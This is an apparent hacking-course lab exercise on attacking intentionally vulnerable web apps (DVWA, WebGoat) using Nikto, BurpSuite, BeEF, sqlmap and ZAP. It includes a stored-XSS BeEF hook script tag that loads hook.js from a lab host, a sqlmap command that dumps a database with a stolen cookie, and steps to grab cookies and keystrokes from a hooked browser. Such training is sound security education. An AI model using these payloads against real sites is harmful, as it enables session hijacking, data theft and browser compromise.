Lesson 4: Introduction to Hacking Web Applications

A few popular vulnerable operating systems that you can use (free) to build a hacking lab and practice your skills are:

Additional vulnerable servers and websites that you can use to practice are located at the GitHub repository for The Art of Hacking Training.

All of these are great sources to test various types of attacks against, including the tools available within Kali Linux.

Exercise 4.1

Install Damn Vulnerable Web App (DVWA) in a VM (VirtualBox or VMWare).
Run an nmap scan from your Kali Linux VM to find out all the ports open in that VM.
Become familiar with the tool called Nikto and launch the tool against the DVWA VM.

# nikto -host <ip_address_of_dvwa_host>

Install WebGoat on a VM, Docker container, or physical bare metal machine (up to you ;-) ).
WebGoat is a monster and a super useful framework for you to learn about tons of web application vulnerabilities and related-attacks. I strongly suggest going over all of the lessons and challenges there. They provide step-by-step instructions on how to perform each attack.

Become familiar with BurpSuite.
Start BurpSuite.
Choose Temporary project, Click Next
Choose Use Burp defaults, Click Start Burp
Click on the Proxy tab, then Intercept. Make sure Intercept is Off.
Set Firefox in Kali to use BurpSuite as a proxy and disable captive portal detection. Using Firefox on Kali, browse to about:config. Choose I Accept the Risk. Search for captive. Set network.captive-portal-service.enabled to false. Proxy settings can be found in Open Menu → Preferences → Advanced → Network → Configure how Firefox connects to the Internet → Settings...
Select Manual proxy configuration and make sure HTTP Proxy is set to localhost and port 8080
Using Firefox, browse to http://<your_dvwa_ip_address>/dvwa. You should see the request show up in BurpSuite under HTTP History
Change the Security Level of DVWA to Low. This can be found in DVWA Security.
Start the beef-xss service:

# service beef-xss start

Make sure you can reach the BeEF UI authentication page at http://localhost:3000/ui/authentication

Note: By default, requests to localhost will not be sent to BurpSuite with the default proxy settings

Log in with the usernamebeef and password beef .
In a new tab, navigate to XSS Reflected. You can view the PHP source code by clicking the View Source button at the bottom of the page. Try placing your name in the Textbox and click Submit. From looking at BurpSuite, how was your name sent to the server? Trigger a reflected XSS alert and print out the current document cookie.
Navigate to XSS Stored. Figure out a way to insert a BeEF Hook:

<script src="http://192.168.1.2:3000/hook.js" type="text/javascript"></script>

From the BeEF UI, see if the Windows browser is hooked. If not, figure out why not.
Type your name and a message from Windows in the message and store it.
What version of Firefox is running on the hooked Windows Browser?
What is the size of the screen?
See if you can see the characters that were entered in Windows from the Beef UI. You may need to refresh the log Create a prompt dialog with the message of your choice. (Commands → Browser → Hooked Domain)
Finally, get the hooked browser's cookie.

# sqlmap --cookie="<cookie>" --url="http://metasploitable/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --string="surname" --dump

Complete the Metasploit Unleashed Training Exercises for Web Application Exploit Development.

This is a great resource by the folks from Offensive Security.

Launch the OWASP zaproxy and perform a scan to your vulnerable server. These videos may be useful and of course, the demos that I showed you during the training.
Did you find similar vulnerabilities?
Use zaproxy as a proxy and intercept the data send to your victim.